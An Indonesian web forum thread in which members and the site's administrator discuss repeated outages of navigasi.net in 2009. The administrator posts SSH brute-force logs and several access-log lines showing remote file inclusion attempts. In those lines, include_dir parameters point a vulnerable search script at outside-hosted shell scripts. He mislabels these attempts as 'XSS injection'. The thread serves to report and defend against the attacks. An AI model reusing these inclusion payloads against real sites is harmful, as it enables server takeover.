Login

 
 
 

Forum Bincang Bebas: Orang gila tukang sabotase kurang kerjaan...
 
 
 
TopikOrang gila tukang sabotase kurang kerjaan...
Penulis  Deny

(GMT) 00:31:04 Jumat, 15 Mei 2009 
Tanggapan : 18

Dilihat: 2374

Kategori : Bincang Bebas 

Dalam sehari belakangan kemarin setau saya udah 2x ada orang gila yg mau mensabotase website navigasi.net. pertama saya akses tdk bisa masuk,server error.. terus kemudian stlh beberapa saat katanya server udh di restart ulang,dan bisa diakses lg, kemudian waktu malam tiba ketika akan diakses lagi,eh ternyata disabotase lagi,bener2 eamng kurang kerjaan ya tu orang,kayak ngga ada kerjaan lain..

nah waktu saya nulis ini jam 7.30 pagi,ternyata bisa dikses kembali,tapi kalo terus2an gini terus kan repot juga ya..
bos buyung,sekedar saran nih,apa nggak sebaiknya dikasih "anti virus" dan "anti orang gila" supaya kita semua ngga direpotkan oleh hal2 semacam ini terus menerus.

saya jadi berpikir kenapa kok ngga website lain yg dibeginikan, kok nav.net ini sering banget dijahili orang gila, ato jangan2 kompetitor kali ya.. ato barangkali ada musuh dalam selimut,menyaru sebagai member, terus menggerogoti jeroan (dlm bhs jawa)

ya udah deh sementara gitu dulu aja..

salam buat semuanya...
 

 Halaman : 1  

 
Tanggapan

Buyung Akram, (GMT) 00:55:33 Jumat, 15 Mei 2009)

 
Ada beberapa hal yang harus saya rombak di script/program navigasi.net untuk meminimalkan kejadian seperti ini. Namun berhubung sudah banyak sekali program yang ada, sehingga butuh effort besar untuk melakukannya. Semoga dalam waktu dekat saya bisa menyelesaikannya.

arieonline, (GMT) 02:49:20 Jumat, 15 Mei 2009)

 
bos mo usul ajah, inikan pake VPS (CMIIW), kebetulan sy 'melihara' VPS juga yg visitornya cukup rame, VPS bisa tunning sendiri servernya, klo bisa pake webserver yang ringan (lighttpd) dan pasang firewall csf ajah

ref:
http://www.lighttpd.net/
http://www.configserver.com/cp/csf.html

SamDMan, (GMT) 03:00:35 Jumat, 15 Mei 2009)

 
Hehe, ni bedua sama2 tinggal di satu daerah, mending kopi daratan aja de kali?
Ato sekalian kopi darat lagi ni komunitas kita bung B? Da lama ngga ktemuan.

arieonline, (GMT) 04:08:34 Jumat, 15 Mei 2009)

 
kopi darat? wah asik ketemu pak buyung....

Deny, (GMT) 00:43:45 Rabu, 20 Mei 2009)

 
mungkin yg kena serangan ngga cuma di sini, tapi di website tetangga juga rupanya www.garminindonesia.com
sama seperti disini,ngga bisa diakses juga

SamDMan, (GMT) 07:25:03 Rabu, 20 Mei 2009)

 
Repot emang kalo kena serangan di internet. Kali gampangan kongkow darat, biar ga gampang diserang. Kecuali diserang waiter, ngojok2 suru pulang. Hehe!

Deny, (GMT) 07:37:38 Rabu, 20 Mei 2009)

 
alias ngusir.. kt dianggep virus kali klo sampe diusir waiter,he2..

Isra, (GMT) 09:21:29 Rabu, 20 Mei 2009)

 
waaaah.... ketemuannya kapan???? aku ikuuuut...

Isra

kapteon, (GMT) 15:30:13 Rabu, 20 Mei 2009)

 
sehari aja.. nggak.. mampir ke sini..rasa ada yg kurang, apalagi berhari2. Kami dari pedalaman cuman bisa tulung do'a...moga2 para suhu cepat dpt ngatasi masalah yg mengganggu...

gaz, (GMT) 03:11:46 Jumat, 29 Mei 2009)

 
Ia ne... heheheh. ati2 loh sama hacker. hehehe.

gaz, (GMT) 03:19:56 Jumat, 29 Mei 2009)

 
[mode sok tau :on]^^
Kalo masalah sabotase... brti kan dia ganti DNS nya tu.
jangan lupa domain nya di lock dulu min.. trus jangan kasi pengunjung bisa nyisipin [HTML] di postingan.. nah itu celah buat hacker..

saya rasa si ini cuman pengalihan DNS.. karena mungkin DNS dan domain navigasi.net belum di lock.

kalo serangan DDOS nga mungkin lah.. soal nya kalo DDOS cuman memperpadet jaringan. dan link2 yang dari luar nga bsa tampil. tapi kalo saya liat kan navigasi .net contennya dari dalem semua nga ada yang dari luar. so gpp..

heheh maaf kalo salah heheh

Adi DJ, (GMT) 04:08:28 Jumat, 29 Mei 2009)

 
OOT: mau nanya. ada yang kenal cyrus nggak? katanya sih temennya Sylar. hehehe

Buyung Akram, (GMT) 07:03:47 Jumat, 29 Mei 2009)

 
Navigasi.net servernya di US bos,. bukan server IIX. Mahal euy kalau sewa server lokal.

So far hampir setiap 2 detik ada saja yang serang server ini, dari berbagai negara. Salah satu cuplikannay adalah sebagai berikut:
May 28 05:03:20 vps sshd[23577]: Failed password for root from ::ffff:219.235.232.11 port 50325 ssh2
May 28 05:03:24 vps sshd[23654]: Failed password for root from ::ffff:219.235.232.11 port 50726 ssh2
May 28 05:03:28 vps sshd[23714]: Failed password for root from ::ffff:219.235.232.11 port 51127 ssh2
May 28 05:03:32 vps sshd[23770]: Failed password for root from ::ffff:219.235.232.11 port 51520 ssh2
May 28 05:03:36 vps sshd[23835]: Failed password for root from ::ffff:219.235.232.11 port 51924 ssh2
May 28 05:03:41 vps sshd[23895]: Failed password for root from ::ffff:219.235.232.11 port 52321 ssh2
May 28 05:03:45 vps sshd[23964]: Failed password for root from ::ffff:219.235.232.11 port 52709 ssh2
May 28 05:03:49 vps sshd[24016]: Failed password for root from ::ffff:219.235.232.11 port 53124 ssh2
May 28 05:03:53 vps sshd[24073]: Failed password for root from ::ffff:219.235.232.11 port 53512 ssh2
May 28 05:03:58 vps sshd[24150]: Failed password for root from ::ffff:219.235.232.11 port 53921 ssh2
May 28 05:04:02 vps sshd[24218]: Failed password for root from ::ffff:219.235.232.11 port 54315 ssh2
May 28 05:04:06 vps sshd[24306]: Failed password for root from ::ffff:219.235.232.11 port 54715 ssh2
May 28 05:04:08 vps sshd[24398]: Invalid user test from ::ffff:219.235.232.11
May 28 05:04:10 vps sshd[24398]: Failed password for invalid user test from ::ffff:219.235.232.11 port 55120 ssh2
May 28 05:04:12 vps sshd[24469]: Invalid user test from ::ffff:219.235.232.11
May 28 05:04:14 vps sshd[24469]: Failed password for invalid user test from ::ffff:219.235.232.11 port 55500 ssh2
May 28 05:04:16 vps sshd[24524]: Invalid user test from ::ffff:219.235.232.11
May 28 05:04:19 vps sshd[24524]: Failed password for invalid user test from ::ffff:219.235.232.11 port 55922 ssh2
May 28 05:04:21 vps sshd[25616]: Invalid user guest from ::ffff:219.235.232.11
May 28 05:04:23 vps sshd[25616]: Failed password for invalid user guest from ::ffff:219.235.232.11 port 56345 ssh2
May 28 05:04:25 vps sshd[25680]: Invalid user admin from ::ffff:219.235.232.11
May 28 05:04:27 vps sshd[25680]: Failed password for invalid user admin from ::ffff:219.235.232.11 port 56750 ssh2
May 28 05:04:29 vps sshd[25755]: Invalid user user from ::ffff:219.235.232.11
May 28 05:04:31 vps sshd[25755]: Failed password for invalid user user from ::ffff:219.235.232.11 port 57148 ssh2
May 28 05:04:33 vps sshd[25842]: Invalid user cyrus from ::ffff:219.235.232.11
May 28 05:04:36 vps sshd[25842]: Failed password for invalid user cyrus from ::ffff:219.235.232.11 port 57533 ssh2
May 28 05:04:40 vps sshd[25906]: Failed password for mysql from ::ffff:219.235.232.11 port 57932 ssh2

arieonline, (GMT) 12:03:26 Jumat, 29 Mei 2009)

 
Gan, sshd bruteforce itu dah biasa bg server online.
Pake fail2ban bisa koq utk ngeblock itu

Buyung Akram, (GMT) 13:00:51 Sabtu, 30 Mei 2009)

 
He..he..he.. yang itu bisa udah bisa diatasi,.. masih ada yang melakukan hal lainnya agar situs ini down.

Kendala utama gua buta mengani unix, but kejadian ini mau tak mau gua mesti mulai banyak bejar ttg unix

Buyung Akram, (GMT) 22:57:23 Sabtu, 30 Mei 2009)

 
Setelah seharian dibantu oleh team support dari situs lunarpages.com, akhirnya penyebab dan asal mula serangan telah bisa diketahui dan di atasi dengan cukup baik.

Cukup 'kreatif' penyerang situs navigasi.net ini. Ada yang berusaha mencoba mencuri password root, ada pula yang memanfaatkan port IRC untuk membanjiri data sehingga server stuck, dan juga ada yang menggunakan tehnik XSS injection. Yang terakhir ini cukup mengerikan, karena tanpa gua sadari dia berhasil membuat satu direktori khusus
didalam situs navigasi.net untuk kemudian menambahkan crontab yang berjalan tiap detik untuk membebani server navnet. Dari log yang berhasil terekam setidaknya terdapat 3 server yang mencoba metoda XSS injection, berikut cuplikan log-nya:

70.89.181.197 - - [04/May/2009:07:14:19 +0700] "GET
/gosrc.php//search.php?include_dir=http://www.candidography.com/zero//phpxz.txt?&modez=psybnc
HTTP/1.1" 200 7277 "-" "Mozilla/5.0"

41.202.20.168 - - [30/May/2009:21:58:55 +0700] "GET
/gosrc.php//sphider/search.php?include_dir=http://awala.freehostia.com/cmd.txt?http://www.sons-of-the-emperor.de/modules/coppermine/themes/default/cmd.txt?&action=upload&chdir=/var/www/vhosts/navigasi.net/httpdocs/nnlog/
HTTP/1.1" 200 309632 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

70.89.181.197 - - [04/May/2009:07:14:15 +0700] "GET
/gosrc.php//search.php?include_dir=http://www.exotictravelasia.com/webalizer/v1.txt??
HTTP/1.1" 200 6273 "-" "Mozilla/5.0"

Ternyata script tambahan yang gua gunakan untuk fitur pencarian data di situs navigasi.net yang berasal dari site sphider.eu rentan XSS injection. Kunjungan kemaren ke situs sphider.eu telah tersedia bug fixing untuk mengatasi XSS injection. Tapi untuk sementara fitur pencarian saya matikan terlebih dahulu, untuk menghindari hal-hal yang
tidak diinginkan.

So, sebagai rasa ungkapan terimakasih terhadap webhosting gua yang telah memberikan support yang sangat baik dalam mencari tahu dan mengatasi serangan yang terjadi terhadap situs navigasi.net, maka kalau ada yang mau bikin website silahkan pakai jasa situs lunarpages.com "PROMOSI MODE ON"

Deny, (GMT) 08:18:35 Minggu, 31 Mei 2009)

 
wah ternyata yg usil dr negara tetangga jg ada rupanya,sy kira cuma org lokal

Buyung Akram, (GMT) 10:26:50 Minggu, 31 Mei 2009)

 
Waah,.. jangan mudah tertipu oleh ip, bisa jadi yang nyerang orang lokal dengan menggunakan proxy dari luar negeri

Anda diharuskan login terlebih dahulu sebelum memberi tanggapan.
 navigasi.net 2003 - 2026